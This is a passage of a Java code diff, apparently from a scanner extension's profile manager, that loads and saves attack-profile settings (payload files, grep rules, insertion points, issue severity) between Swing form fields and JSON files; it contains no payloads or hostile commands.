profile_property.getIsURLExtension(); + urlextension = profile_property.getURLExtension(); + NegativeUrlExtension = profile_property.getNegativeURLExtension(); + redirtype = profile_property.getRedirection(); + maxRedir = profile_property.getMaxRedir(); + payloadsfile = profile_property.getpayloadsFile(); + grepsfile = profile_property.getgrepsFile(); + payloadPosition = profile_property.getPayloadPosition(); + timeOut1 = profile_property.getTime1(); + timeOut2 = profile_property.getTime2(); + author = profile_property.getAuthor(); + contentLength = profile_property.getContentLength(); + httpResponseCode = profile_property.getHttpResponseCode(); + headers = profile_property.getHeader(); + variationAttributes = profile_property.getVariationAttributes(); + insertionPointType = profile_property.getInsertionPointType(); + + profile.textauthor.setText(author); + profile.text1.setText(name); + + if (payloadPosition == 1) { + profile.buttonGroup1.setSelected(profile.replace.getModel(), true); + } else if (payloadPosition == 2) { + profile.buttonGroup1.setSelected(profile.append.getModel(), true); + }else if (payloadPosition == 3) { + profile.buttonGroup1.setSelected(profile.insert.getModel(), true); + } + + profile.grep.removeAllElements(); + profile.payload.removeAllElements(); + profile.encoder.removeAllElements(); + profile.tag.removeAllElements(); + + profile.textpayloads.setText(payloadsfile); + profile.textgreps.setText(grepsfile); + + profile.showGreps(profile_property.getGreps()); + profile.showPayloads(profile_property.getPayloads()); + +// if (!payloadsfile.isEmpty()) { +// loadPath(payloadsfile, profile.payload); +// updatePayloads(payloadsfile, profile_property); +// +// } else { +// for (String pay : profile_property.getPayloads()) { +// profile.payload.addElement(pay); +// } +// } + + if (profile_property.getTags() != null) { + for (String t : profile_property.getTags()) { + profile.tag.addElement(t); + } + } + + for (String enc : profile_property.getEncoder()) { + profile.encoder.addElement(enc); + } + + profile.text71.setText(contenttype); + profile.text72.setText(responsecode); + profile.text73.setText(urlextension); + + profile.check8.setSelected(urlencode); + profile.text5.setText(charstourlencode); + profile.excludehttp.setSelected(excludeHTTP); + profile.onlyhttp.setSelected(onlyHTTP); + + if (timeOut2.equals("0")) { + profile.texttime2.setText(""); + } else { + profile.texttime2.setText(timeOut2); + } + + if (timeOut1.equals("0")) { + profile.texttime1.setText(""); + } else { + profile.texttime1.setText(timeOut1); + } + + profile.textcl.setText(contentLength); + profile.resposecode.setText(httpResponseCode); + + switch (matchtype) { + case 1: + profile.buttonGroup3.setSelected(profile.radio4.getModel(), true); + break; + case 2: + profile.buttonGroup3.setSelected(profile.radio3.getModel(), true); + break; + case 3: + profile.buttonGroup3.setSelected(profile.radio12.getModel(), true); + break; + case 4: + profile.buttonGroup3.setSelected(profile.radio22.getModel(), true); + break; + case 5: + profile.buttonGroup3.setSelected(profile.radiotime.getModel(), true); + break; + case 6: + profile.buttonGroup3.setSelected(profile.radiocl.getModel(), true); + break; + case 7: + profile.buttonGroup3.setSelected(profile.variationsRadio.getModel(), true); + break; + case 8: + profile.buttonGroup3.setSelected(profile.invariationsRadio.getModel(), true); + break; + case 9: + profile.buttonGroup3.setSelected(profile.radiohttp.getModel(), true); + break; + default: + profile.buttonGroup3.clearSelection(); + break; + } + + switch (redirtype) { + case 1: + profile.buttonGroup4.setSelected(profile.rb1.getModel(), true); + break; + case 2: + profile.buttonGroup4.setSelected(profile.rb2.getModel(), true); + break; + case 3: + profile.buttonGroup4.setSelected(profile.rb3.getModel(), true); + break; + case 4: + profile.buttonGroup4.setSelected(profile.rb4.getModel(), true); + break; + default: + profile.buttonGroup4.clearSelection(); + break; + } + + profile.showHeaders(headers); + + setSelectedVariations(false, profile); + + if (variationAttributes.contains("status_code")) { + profile.status_code.setSelected(true); + } + if (variationAttributes.contains("input_image_labels")) { + profile.input_image_labels.setSelected(true); + } + if (variationAttributes.contains("non_hidden_form_input_types")) { + profile.non_hidden_form_input_types.setSelected(true); + } + if (variationAttributes.contains("page_title")) { + profile.page_title.setSelected(true); + } + if (variationAttributes.contains("visible_text")) { + profile.visible_text.setSelected(true); + } + if (variationAttributes.contains("button_submit_labels")) { + profile.button_submit_labels.setSelected(true); + } + if (variationAttributes.contains("div_ids")) { + profile.div_ids.setSelected(true); + } + if (variationAttributes.contains("word_count")) { + profile.word_count.setSelected(true); + } + if (variationAttributes.contains("content_type")) { + profile.content_type.setSelected(true); + } + if (variationAttributes.contains("outbound_edge_tag_names")) { + profile.outbound_edge_tag_names.setSelected(true); + } + if (variationAttributes.contains("whole_body_content")) { + profile.whole_body_content.setSelected(true); + } + if (variationAttributes.contains("etag_header")) { + profile.etag_header.setSelected(true); + } + if (variationAttributes.contains("visible_word_count")) { + profile.visible_word_count.setSelected(true); + } + if (variationAttributes.contains("content_length")) { + profile.content_length.setSelected(true); + } + if (variationAttributes.contains("header_tags")) { + profile.header_tags.setSelected(true); + } + if (variationAttributes.contains("tag_ids")) { + profile.tag_ids.setSelected(true); + } + if (variationAttributes.contains("comments")) { + profile.comments.setSelected(true); + } + if (variationAttributes.contains("line_count")) { + profile.line_count.setSelected(true); + } + if (variationAttributes.contains("set_cookie_names")) { + profile.set_cookie_names.setSelected(true); + } + if (variationAttributes.contains("last_modified_header")) { + profile.last_modified_header.setSelected(true); + } + if (variationAttributes.contains("first_header_tag")) { + profile.first_header_tag.setSelected(true); + } + if (variationAttributes.contains("tag_names")) { + profile.tag_names.setSelected(true); + } + if (variationAttributes.contains("input_submit_labels")) { + profile.input_submit_labels.setSelected(true); + } + if (variationAttributes.contains("outbound_edge_count")) { + profile.outbound_edge_count.setSelected(true); + } + if (variationAttributes.contains("initial_body_content")) { + profile.initial_body_content.setSelected(true); + } + if (variationAttributes.contains("content_location")) { + profile.content_location.setSelected(true); + } + if (variationAttributes.contains("limited_body_content")) { + profile.limited_body_content.setSelected(true); + } + if (variationAttributes.contains("canonical_link")) { + profile.canonical_link.setSelected(true); + } + if (variationAttributes.contains("css_classes")) { + profile.css_classes.setSelected(true); + } + if (variationAttributes.contains("location")) { + profile.location.setSelected(true); + } + if (variationAttributes.contains("anchor_labels")) { + profile.anchor_labels.setSelected(true); + } + + profile.setSelectedInsertionPointType(false); + + if (insertionPointType.contains(18)) { + profile.All.setSelected(true); + } + if (insertionPointType.contains(65)) { + profile.extensionprovided.setSelected(true); + } + if (insertionPointType.contains(32)) { + profile.header.setSelected(true); + } + if (insertionPointType.contains(36)) { + profile.entirebody.setSelected(true); + } + if (insertionPointType.contains(7)) { + profile.paramamf.setSelected(true); + } + if (insertionPointType.contains(1)) { + profile.parambody.setSelected(true); + } + if (insertionPointType.contains(2)) { + profile.paramcookie.setSelected(true); + } + if (insertionPointType.contains(6)) { + profile.paramjson.setSelected(true); + } + if (insertionPointType.contains(33)) { + profile.urlpathfolder.setSelected(true); + } + if (insertionPointType.contains(5)) { + profile.parammultipartattr.setSelected(true); + } + if (insertionPointType.contains(35)) { + profile.paramnamebody.setSelected(true); + } + if (insertionPointType.contains(34)) { + profile.paramnameurl.setSelected(true); + } + if (insertionPointType.contains(64)) { + profile.userprovided.setSelected(true); + } + if (insertionPointType.contains(0)) { + profile.paramurl.setSelected(true); + } + if (insertionPointType.contains(3)) { + profile.paramxml.setSelected(true); + } + if (insertionPointType.contains(4)) { + profile.paramxmlattr.setSelected(true); + } + if (insertionPointType.contains(37)) { + profile.urlpathfilename.setSelected(true); + } + if (insertionPointType.contains(127)) { + profile.unknown.setSelected(true); + } + + profile.check1.setSelected(casesensitive); + profile.check4.setSelected(notresponse); + profile.check71.setSelected(iscontenttype); + profile.check72.setSelected(isresponsecode); + profile.check73.setSelected(isurlextension); + profile.negativeCT.setSelected(negativect); + profile.negativeRC.setSelected(negativerc); + profile.negativeURL.setSelected(NegativeUrlExtension); + profile.text4.setText(issuename); + profile.textarea1.setText(issuedetail); + profile.textarea2.setText(issuebackground); + profile.textarea3.setText(remediationdetail); + profile.textarea4.setText(remediationbackground); + profile.sp1.setValue(maxRedir); + + switch (issueseverity) { + case "High": + profile.buttonGroup5.setSelected(profile.radio5.getModel(), true); + break; + case "Medium": + profile.buttonGroup5.setSelected(profile.radio6.getModel(), true); + break; + case "Low": + profile.buttonGroup5.setSelected(profile.radio7.getModel(), true); + break; + case "Information": + profile.buttonGroup5.setSelected(profile.radio8.getModel(), true); + break; + default: + break; + } + + switch (issueconfidence) { + case "Certain": + profile.buttonGroup6.setSelected(profile.radio9.getModel(), true); + break; + case "Firm": + profile.buttonGroup6.setSelected(profile.radio10.getModel(), true); + break; + case "Tentative": + profile.buttonGroup6.setSelected(profile.radio11.getModel(), true); + break; + default: + break; + } + } catch (Exception e) { + System.out.println("PofilesManager line 499:" + e.getMessage()); + for (StackTraceElement element : e.getStackTrace()) { + System.out.println(element); + } + } + } + + public void saveActiveAttackValues(ActiveProfile profile) { + headers = new ArrayList(); + variationAttributes = new ArrayList(); + insertionPointType = new ArrayList(); + //Save attack with fields values + try { + //get GUI values + ProfilesProperties newfile = new ProfilesProperties(); + + newfile.setProfileName(profile.text1.getText()); + + newfile.setAuthor(profile.textauthor.getText()); + + newfile.setScanner(1); + + if (profile.replace.isSelected()) { + newfile.setPayloadPosition(1); + } else if (profile.append.isSelected()) { + newfile.setPayloadPosition(2); + } else if (profile.insert.isSelected()) { + newfile.setPayloadPosition(3); + } + + newfile.setEnabled(true); + List encoders = new ArrayList(); + List payloads = new ArrayList(); + List greps = new ArrayList(); + List tags = new ArrayList(); + + newfile.setPayloadsFile(profile.textpayloads.getText()); + for (int i = 0; i < profile.modelpayload.getRowCount(); i++) { + if (!profile.modelpayload.getValueAt(i, 1).toString().isEmpty()) { + payloads.add(profile.modelpayload.getValueAt(i, 0).toString() + "," + profile.modelpayload.getValueAt(i, 1).toString()); + } + } + newfile.setPayloads(payloads); + + newfile.setGrepsFile(profile.textgreps.getText()); + for (int i = 0; i < profile.modelgrep.getRowCount(); i++) { + if (!profile.modelgrep.getValueAt(i, 2).toString().isEmpty()) { + greps.add(profile.modelgrep.getValueAt(i, 0).toString() + "," + profile.modelgrep.getValueAt(i, 1).toString() + "," + profile.modelgrep.getValueAt(i, 2).toString()); + } + } + newfile.setGreps(greps); + + for (int row = 0; row < profile.model4.getRowCount(); row++) { + headers.add(new Headers((String) profile.model4.getValueAt(row, 0), (String) profile.model4.getValueAt(row, 1), (String) profile.model4.getValueAt(row, 2), (String) profile.model4.getValueAt(row, 3))); + } + newfile.setHeader(headers); + + for (int i = 0; i < profile.listtag.getModel().getSize(); i++) { + Object item = profile.listtag.getModel().getElementAt(i); + if (!item.toString().isEmpty()) { + tags.add(item.toString().replaceAll("\r", "").replaceAll("\n", "")); + } + } + if (!tags.contains("All")) { + tags.add("All"); + newfile.setTags(tags); + } else { + newfile.setTags(tags); + } + + for (int i = 0; i < profile.list3.getModel().getSize(); i++) { + Object item = profile.list3.getModel().getElementAt(i); + if (!item.toString().isEmpty()) { + encoders.add(item.toString().replaceAll("\r", "").replaceAll("\n", "")); + } + } + + newfile.setEncoder(encoders); + newfile.setCharsToUrlEncode(profile.text5.getText()); + newfile.setUrlEncode(profile.check8.isSelected()); + newfile.setExcludeHTTP(profile.excludehttp.isSelected()); + newfile.setOnlyHTTP(profile.onlyhttp.isSelected()); + newfile.setContentType(profile.text71.getText()); + newfile.setResponseCode(profile.text72.getText()); + newfile.setURLExtension(profile.text73.getText()); + + newfile.setTime2(profile.texttime2.getText()); + newfile.setTime1(profile.texttime1.getText()); + newfile.setContentLength(profile.textcl.getText()); + newfile.setHttpResponseCode(profile.resposecode.getText()); + + if (profile.radio4.isSelected()) { + newfile.setMatchType(1); + } else if (profile.radio3.isSelected()) { + newfile.setMatchType(2); + } else if (profile.radio12.isSelected()) { + newfile.setMatchType(3); + } else if (profile.radio22.isSelected()) { + newfile.setMatchType(4); + } else if (profile.radiotime.isSelected()) { + newfile.setMatchType(5); + } else if (profile.radiocl.isSelected()) { + newfile.setMatchType(6); + } else if (profile.variationsRadio.isSelected()) { + newfile.setMatchType(7); + } else if (profile.invariationsRadio.isSelected()) { + newfile.setMatchType(8); + } else if (profile.radiohttp.isSelected()) { + newfile.setMatchType(9); + } else { + newfile.setMatchType(0); + } + + if (profile.rb1.isSelected()) { + newfile.setRedirType(1); + } else if (profile.rb2.isSelected()) { + newfile.setRedirType(2); + } else if (profile.rb3.isSelected()) { + newfile.setRedirType(3); + } else if (profile.rb4.isSelected()) { + newfile.setRedirType(4); + } else { + newfile.setRedirType(0); + } + + if (profile.status_code.isSelected()) { + variationAttributes.add("status_code"); + } + if (profile.input_image_labels.isSelected()) { + variationAttributes.add("input_image_labels"); + } + if (profile.non_hidden_form_input_types.isSelected()) { + variationAttributes.add("non_hidden_form_input_types"); + } + if (profile.page_title.isSelected()) { + variationAttributes.add("page_title"); + } + if (profile.visible_text.isSelected()) { + variationAttributes.add("visible_text"); + } + if (profile.button_submit_labels.isSelected()) { + variationAttributes.add("button_submit_labels"); + } + if (profile.div_ids.isSelected()) { + variationAttributes.add("div_ids"); + } + if (profile.word_count.isSelected()) { + variationAttributes.add("word_count"); + } + if (profile.content_type.isSelected()) { + variationAttributes.add("content_type"); + } + if (profile.outbound_edge_tag_names.isSelected()) { + variationAttributes.add("outbound_edge_tag_names"); + } + if (profile.whole_body_content.isSelected()) { + variationAttributes.add("whole_body_content"); + } + if (profile.etag_header.isSelected()) { + variationAttributes.add("etag_header"); + } + if (profile.visible_word_count.isSelected()) { + variationAttributes.add("visible_word_count"); + } + if (profile.content_length.isSelected()) { + variationAttributes.add("content_length"); + } + if (profile.header_tags.isSelected()) { + variationAttributes.add("header_tags"); + } + if (profile.tag_ids.isSelected()) { + variationAttributes.add("tag_ids"); + } + if (profile.comments.isSelected()) { + variationAttributes.add("comments"); + } + if (profile.line_count.isSelected()) { + variationAttributes.add("line_count"); + } + if (profile.set_cookie_names.isSelected()) { + variationAttributes.add("set_cookie_names"); + } + if (profile.last_modified_header.isSelected()) { + variationAttributes.add("last_modified_header"); + } + if (profile.first_header_tag.isSelected()) { + variationAttributes.add("first_header_tag"); + } + if (profile.tag_names.isSelected()) { + variationAttributes.add("tag_names"); + } + if (profile.input_submit_labels.isSelected()) { + variationAttributes.add("input_submit_labels"); + } + if (profile.outbound_edge_count.isSelected()) { + variationAttributes.add("outbound_edge_count"); + } + if (profile.initial_body_content.isSelected()) { + variationAttributes.add("initial_body_content"); + } + if (profile.content_location.isSelected()) { + variationAttributes.add("content_location"); + } + if (profile.limited_body_content.isSelected()) { + variationAttributes.add("limited_body_content"); + } + if (profile.canonical_link.isSelected()) { + variationAttributes.add("canonical_link"); + } + if (profile.css_classes.isSelected()) { + variationAttributes.add("css_classes"); + } + if (profile.location.isSelected()) { + variationAttributes.add("location"); + } + if (profile.anchor_labels.isSelected()) { + variationAttributes.add("anchor_labels"); + } + + newfile.setVariationAttributes(variationAttributes); + + if (profile.All.isSelected()) { + insertionPointType.add(18); + insertionPointType.add(65); + insertionPointType.add(32); + insertionPointType.add(36); + insertionPointType.add(7); + insertionPointType.add(1); + insertionPointType.add(2); + insertionPointType.add(6); + insertionPointType.add(33); + insertionPointType.add(5); + insertionPointType.add(35); + insertionPointType.add(34); + insertionPointType.add(64); + insertionPointType.add(0); + insertionPointType.add(3); + insertionPointType.add(4); + insertionPointType.add(37); + insertionPointType.add(127); + } + + if (profile.extensionprovided.isSelected()) { + insertionPointType.add(65); + } + if (profile.header.isSelected()) { + insertionPointType.add(32); + } + if (profile.entirebody.isSelected()) { + insertionPointType.add(36); + } + if (profile.paramamf.isSelected()) { + insertionPointType.add(7); + } + if (profile.parambody.isSelected()) { + insertionPointType.add(1); + } + if (profile.paramcookie.isSelected()) { + insertionPointType.add(2); + } + if (profile.paramjson.isSelected()) { + insertionPointType.add(6); + } + if (profile.urlpathfolder.isSelected()) { + insertionPointType.add(33); + } + if (profile.parammultipartattr.isSelected()) { + insertionPointType.add(5); + } + if (profile.paramnamebody.isSelected()) { + insertionPointType.add(35); + } + if (profile.paramnameurl.isSelected()) { + insertionPointType.add(34); + } + if (profile.userprovided.isSelected()) { + insertionPointType.add(64); + } + if (profile.paramurl.isSelected()) { + insertionPointType.add(0); + } + if (profile.paramxml.isSelected()) { + insertionPointType.add(3); + } + if (profile.paramxmlattr.isSelected()) { + insertionPointType.add(4); + } + if (profile.urlpathfilename.isSelected()) { + insertionPointType.add(37); + } + if (profile.unknown.isSelected()) { + insertionPointType.add(127); + } + newfile.setInsertionPointType(insertionPointType); + + newfile.setCaseSensitive(profile.check1.isSelected()); + newfile.setNotResponse(profile.check4.isSelected()); + newfile.setIsContentType(profile.check71.isSelected()); + newfile.setIsResponseCode(profile.check72.isSelected()); + newfile.setIsURLExtension(profile.check73.isSelected()); + newfile.setNegativeCT(profile.negativeCT.isSelected()); + newfile.setNegativeRC(profile.negativeRC.isSelected()); + newfile.setNegativeURLExtension(profile.negativeURL.isSelected()); + newfile.setIssueName(profile.text4.getText()); + newfile.setIssueDetail(profile.textarea1.getText()); + newfile.setIssueBackground(profile.textarea2.getText()); + newfile.setRemediationDetail(profile.textarea3.getText()); + newfile.setRemediationBackground(profile.textarea4.getText()); + newfile.setMaxRedir((Integer) profile.sp1.getValue()); + + if (profile.radio5.isSelected()) { + newfile.setIssueSeverity("High"); + } else if (profile.radio6.isSelected()) { + newfile.setIssueSeverity("Medium"); + } else if (profile.radio7.isSelected()) { + newfile.setIssueSeverity("Low"); + } else if (profile.radio8.isSelected()) { + newfile.setIssueSeverity("Information"); + } else { + newfile.setIssueSeverity(""); + } + + if (profile.radio9.isSelected()) { + newfile.setIssueConfidence("Certain"); + } else if (profile.radio10.isSelected()) { + newfile.setIssueConfidence("Firm"); + } else if (profile.radio11.isSelected()) { + newfile.setIssueConfidence("Tentative"); + } else { + newfile.setIssueConfidence(""); + } + + //Save start + GsonBuilder builder = new GsonBuilder().setPrettyPrinting(); + Gson gson = builder.create(); + + JsonArray ijson = new JsonArray(); + List newjson = gson.fromJson(ijson, new TypeToken>() { + }.getType()); + newjson.add(newfile); + + String json = gson.toJson(newjson); + + //Write JSON String to file + FileOutputStream fileStream; + + fileStream = new FileOutputStream(new File(profiles_directory + File.separator + profile.text1.getText().concat(".bb"))); + + OutputStreamWriter writer = new OutputStreamWriter(fileStream, "UTF-8"); + writer.write(json); + writer.close(); + + } catch (IOException e) { + System.out.println("ProfilesManager line 852:"); + for (StackTraceElement element : e.getStackTrace()) { + System.out.println(element); + } + } + } + + public void setResponseAttackValues(String profile_name, JsonArray passiveresprofiles, ResponseProfile profile) { + //Set Attack values when select from main combobox + try { + GsonBuilder builder = new GsonBuilder().setPrettyPrinting(); + Gson gson = builder.create(); + JsonArray json = passiveresprofiles; + ProfilesProperties profile_property = new ProfilesProperties(); + + if (json != null) { + for (JsonElement pa : json) { + JsonObject bbObj = pa.getAsJsonObject(); + if (bbObj.get("ProfileName").getAsString().equals(profile_name)) { + profile_property = gson.fromJson(bbObj.toString(), ProfilesProperties.class + ); + } + + } + } + + name = profile_property.getProfileName(); + casesensitive = profile_property.getCaseSensitive(); + notresponse = profile_property.getNotResponse(); + matchtype = profile_property.getMatchType(); + scope = profile_property.getScope(); + issuename = profile_property.getIssueName(); + issueseverity = profile_property.getIssueSeverity(); + issueconfidence = profile_property.getIssueConfidence(); + issuedetail = profile_property.getIssueDetail(); + issuebackground = profile_property.getIssueBackground(); + remediationdetail = profile_property.getRemediationDetail(); + remediationbackground = profile_property.getRemediationBackground(); + iscontenttype = profile_property.getIsContentType(); + isresponsecode = profile_property.getIsResponseCode(); + contenttype = profile_property.getContentType(); + responsecode = profile_property.getResponseCode(); + excludeHTTP = profile_property.getExcludeHTTP(); + onlyHTTP = profile_property.getOnlyHTTP(); + negativect = profile_property.getNegativeCT(); + negativerc = profile_property.getNegativeRC(); + redirtype = profile_property.getRedirection(); + isurlextension = profile_property.getIsURLExtension(); + urlextension = profile_property.getURLExtension(); + NegativeUrlExtension = profile_property.getNegativeURLExtension(); + maxRedir = profile_property.getMaxRedir(); + grepsfile = profile_property.getgrepsFile(); + payloadPosition = profile_property.getPayloadPosition(); + author = profile_property.getAuthor(); + contentLength = profile_property.getContentLength(); + + profile.textauthor.setText(author); + profile.text1.setText(name); + + if (profile_property.getTags() != null) { + for (String t : profile_property.getTags()) { + profile.tag.addElement(t); + } + } + + profile.showGreps(profile_property.getGreps()); + + profile.text71.setText(contenttype); + profile.text72.setText(responsecode); + + profile.excludehttp.setSelected(excludeHTTP); + profile.onlyhttp.setSelected(onlyHTTP); + + switch (matchtype) { + case 1: + profile.buttonGroup3.setSelected(profile.radio4.getModel(), true); + break; + case 2: + profile.buttonGroup3.setSelected(profile.radio3.getModel(), true); + break; + default: + profile.buttonGroup3.clearSelection(); + break; + } + + switch (scope) { + case 1: + profile.buttonGroup7.setSelected(profile.first_match.getModel(), true); + break; + case 2: + profile.buttonGroup7.setSelected(profile.all_matches.getModel(), true); + break; + default: + profile.buttonGroup7.clearSelection(); + break; + } + + switch (redirtype) { + case 1: + profile.buttonGroup4.setSelected(profile.rb1.getModel(), true); + break; + case 2: + profile.buttonGroup4.setSelected(profile.rb2.getModel(), true); + break; + case 3: + profile.buttonGroup4.setSelected(profile.rb3.getModel(), true); + break; + case 4: + profile.buttonGroup4.setSelected(profile.rb4.getModel(), true); + break; + default: + profile.buttonGroup4.clearSelection(); + break; + } + + profile.check1.setSelected(casesensitive); + profile.check4.setSelected(notresponse); + profile.check71.setSelected(iscontenttype); + profile.check72.setSelected(isresponsecode); + profile.negativeCT.setSelected(negativect); + profile.negativeRC.setSelected(negativerc); + profile.text4.setText(issuename); + profile.textarea1.setText(issuedetail); + profile.textarea2.setText(issuebackground); + profile.textarea3.setText(remediationdetail); + profile.textarea4.setText(remediationbackground); + profile.sp1.setValue(maxRedir); + profile.text73.setText(urlextension); + profile.check73.setSelected(isurlextension); + profile.negativeURL.setSelected(NegativeUrlExtension); + + switch (issueseverity) { + case "High": + profile.buttonGroup5.setSelected(profile.radio5.getModel(), true); + break; + case "Medium": + profile.buttonGroup5.setSelected(profile.radio6.getModel(), true); + break; + case "Low": + profile.buttonGroup5.setSelected(profile.radio7.getModel(), true); + break; + case "Information": + profile.buttonGroup5.setSelected(profile.radio8.getModel(), true); + break; + default: + break; + } + + switch (issueconfidence) { + case "Certain": + profile.buttonGroup6.setSelected(profile.radio9.getModel(), true); + break; + case "Firm": + profile.buttonGroup6.setSelected(profile.radio10.getModel(), true); + break; + case "Tentative": + profile.buttonGroup6.setSelected(profile.radio11.getModel(), true); + break; + default: + break; + } + } catch (Exception e) { + System.out.println("ProfilesManager line 1015:" + e.getMessage()); + for (StackTraceElement element : e.getStackTrace()) { + System.out.println(element); + } + } + } + + public void saveResponseAttackValues(ResponseProfile profile) { + //Save attack with fields values + try { + //get GUI values + ProfilesProperties newfile = new ProfilesProperties(); + + newfile.setProfileName(profile.text1.getText()); + + newfile.setAuthor(profile.textauthor.getText()); + + newfile.setScanner(2); + + newfile.setEnabled(true); + List greps = new ArrayList(); + List tags = new ArrayList(); + + newfile.setGrepsFile(profile.textgreps.getText()); + for (int i = 0; i < profile.modelgrep.getRowCount(); i++) { + if (!profile.modelgrep.getValueAt(i, 2).toString().isEmpty()) { + greps.add(profile.modelgrep.getValueAt(i, 0).toString() + "," + profile.modelgrep.getValueAt(i, 1).toString() + "," + profile.modelgrep.getValueAt(i, 2).toString()); + } + } + newfile.setGreps(greps); + + for (int i = 0; i < profile.listtag.getModel().getSize(); i++) { + Object item = profile.listtag.getModel().getElementAt(i); + if (!item.toString().isEmpty()) { + tags.add(item.toString().replaceAll("\r", "").replaceAll("\n", "")); + } + } + if (!tags.contains("All")) { + tags.add("All"); + newfile.setTags(tags); + } else { + newfile.setTags(tags); + } + + if (profile.radio4.isSelected()) { + newfile.setMatchType(1); + } else if (profile.radio3.isSelected()) { + newfile.setMatchType(2); + } else { + newfile.setMatchType(0); + } + + if (profile.first_match.isSelected()) { + newfile.setScope(1); + } else if (profile.all_matches.isSelected()) { + newfile.setScope(2); + } + + newfile.setExcludeHTTP(profile.excludehttp.isSelected()); + newfile.setOnlyHTTP(profile.onlyhttp.isSelected()); + newfile.setContentType(profile.text71.getText()); + newfile.setResponseCode(profile.text72.getText()); + newfile.setURLExtension(profile.text73.getText()); + newfile.setIsURLExtension(profile.check73.isSelected()); + newfile.setNegativeURLExtension(profile.negativeURL.isSelected()); + + if (profile.rb1.isSelected()) { + newfile.setRedirType(1); + } else if (profile.rb2.isSelected()) { + newfile.setRedirType(2); + } else if (profile.rb3.isSelected()) { + newfile.setRedirType(3); + } else if (profile.rb4.isSelected()) { + newfile.setRedirType(4); + } else { + newfile.setRedirType(0); + } + + newfile.setCaseSensitive(profile.check1.isSelected()); + newfile.setNotResponse(profile.check4.isSelected()); + newfile.setIsContentType(profile.check71.isSelected()); + newfile.setIsResponseCode(profile.check72.isSelected()); + newfile.setNegativeCT(profile.negativeCT.isSelected()); + newfile.setNegativeRC(profile.negativeRC.isSelected()); + newfile.setIssueName(profile.text4.getText()); + newfile.setIssueDetail(profile.textarea1.getText()); + newfile.setIssueBackground(profile.textarea2.getText()); + newfile.setRemediationDetail(profile.textarea3.getText()); + newfile.setRemediationBackground(profile.textarea4.getText()); + newfile.setMaxRedir((Integer) profile.sp1.getValue()); + + if (profile.radio5.isSelected()) { + newfile.setIssueSeverity("High"); + } else if (profile.radio6.isSelected()) { + newfile.setIssueSeverity("Medium"); + } else if (profile.radio7.isSelected()) { + newfile.setIssueSeverity("Low"); + } else if (profile.radio8.isSelected()) { + newfile.setIssueSeverity("Information"); + } else { + newfile.setIssueSeverity(""); + } + + if (profile.radio9.isSelected()) { + newfile.setIssueConfidence("Certain"); + } else if (profile.radio10.isSelected()) { + newfile.setIssueConfidence("Firm"); + } else if (profile.radio11.isSelected()) { + newfile.setIssueConfidence("Tentative"); + } else { + newfile.setIssueConfidence(""); + } + + //Save start + GsonBuilder builder = new GsonBuilder().setPrettyPrinting(); + Gson gson = builder.create(); + + JsonArray ijson = new JsonArray(); + List newjson = gson.fromJson(ijson, new TypeToken>() { + }.getType()); + newjson.add(newfile); + + String json = gson.toJson(newjson); + + //Write JSON String to file + FileOutputStream fileStream; + + fileStream = new FileOutputStream(new File(profiles_directory + File.separator + profile.text1.getText().concat(".bb"))); + + OutputStreamWriter writer = new OutputStreamWriter(fileStream, "UTF-8"); + writer.write(json); + writer.close(); + + } catch (IOException e) { + System.out.println("ProfilesManager line 1149:"); + for (StackTraceElement element : e.getStackTrace()) { + System.out.println(element); + } + } + } + + public void setRequestAttackValues(String profile_name,JsonArray passivereqprofiles, RequestProfile profile) { + //Set Attack values when select from main combobox + try { + GsonBuilder builder = new GsonBuilder().setPrettyPrinting(); + Gson gson = builder.create(); + JsonArray json = passivereqprofiles; + ProfilesProperties profile_property = new ProfilesProperties(); + + if (json != null) { + for (JsonElement pa : json) { + JsonObject bbObj = pa.getAsJsonObject(); + if (bbObj.get("ProfileName").getAsString().equals(profile_name)) { + profile_property = gson.fromJson(bbObj.toString(), ProfilesProperties.class + ); + } + + } + } + + name = profile_property.getProfileName(); + casesensitive = profile_property.getCaseSensitive(); + notresponse = profile_property.getNotResponse(); + matchtype = profile_property.getMatchType(); + issuename = profile_property.getIssueName(); + issueseverity = profile_property.getIssueSeverity(); + issueconfidence = profile_property.getIssueConfidence(); + issuedetail = profile_property.getIssueDetail(); + issuebackground = profile_property.getIssueBackground(); + remediationdetail = profile_property.getRemediationDetail(); + remediationbackground = profile_property.getRemediationBackground(); + iscontenttype = profile_property.getIsContentType(); + isresponsecode = profile_property.getIsResponseCode(); + contenttype = profile_property.getContentType(); + responsecode = profile_property.getResponseCode(); + excludeHTTP = profile_property.getExcludeHTTP(); + onlyHTTP = profile_property.getOnlyHTTP(); + negativect = profile_property.getNegativeCT(); + negativerc = profile_property.getNegativeRC(); + redirtype = profile_property.getRedirection(); + maxRedir = profile_property.getMaxRedir(); + grepsfile = profile_property.getgrepsFile(); + payloadPosition = profile_property.getPayloadPosition(); + author = profile_property.getAuthor(); + contentLength = profile_property.getContentLength(); + isurlextension = profile_property.getIsURLExtension(); + urlextension = profile_property.getURLExtension(); + NegativeUrlExtension = profile_property.getNegativeURLExtension(); + Scanas = profile_property.getScanAs(); + Scantype = profile_property.getScanType(); + + profile.textauthor.setText(author); + profile.text1.setText(name); + + profile.grep.removeAllElements(); + profile.tag.removeAllElements(); + + profile.textgreps.setText(grepsfile); + + profile.showGreps(profile_property.getGreps()); + + if (profile_property.getTags() != null) { + for (String t : profile_property.getTags()) { + profile.tag.addElement(t); + } + } + + switch (matchtype) { + case 1: + profile.buttonGroup3.setSelected(profile.radio4.getModel(), true); + break; + case 2: + profile.buttonGroup3.setSelected(profile.radio3.getModel(), true); + break; + default: + profile.buttonGroup3.clearSelection(); + break; + } + + profile.check1.setSelected(casesensitive); + profile.check4.setSelected(notresponse); + profile.text4.setText(issuename); + profile.textarea1.setText(issuedetail); + profile.textarea2.setText(issuebackground); + profile.textarea3.setText(remediationdetail); + profile.textarea4.setText(remediationbackground); + profile.text73.setText(urlextension); + profile.check73.setSelected(isurlextension); + profile.negativeURL.setSelected(NegativeUrlExtension); + + switch (issueseverity) { + case "High": + profile.buttonGroup5.setSelected(profile.radio5.getModel(), true); + break; + case "Medium": + profile.buttonGroup5.setSelected(profile.radio6.getModel(), true); + break; + case "Low": + profile.buttonGroup5.setSelected(profile.radio7.getModel(), true); + break; + case "Information": + profile.buttonGroup5.setSelected(profile.radio8.getModel(), true); + break; + default: + break; + } + + switch (issueconfidence) { + case "Certain": + profile.buttonGroup6.setSelected(profile.radio9.getModel(), true); + break; + case "Firm": + profile.buttonGroup6.setSelected(profile.radio10.getModel(), true); + break; + case "Tentative": + profile.buttonGroup6.setSelected(profile.radio11.getModel(), true); + break; + default: + break; + } + } catch (Exception e) { + System.out.println("ProfilesManager line 1286:" + e.getMessage()); + for (StackTraceElement element : e.getStackTrace()) { + 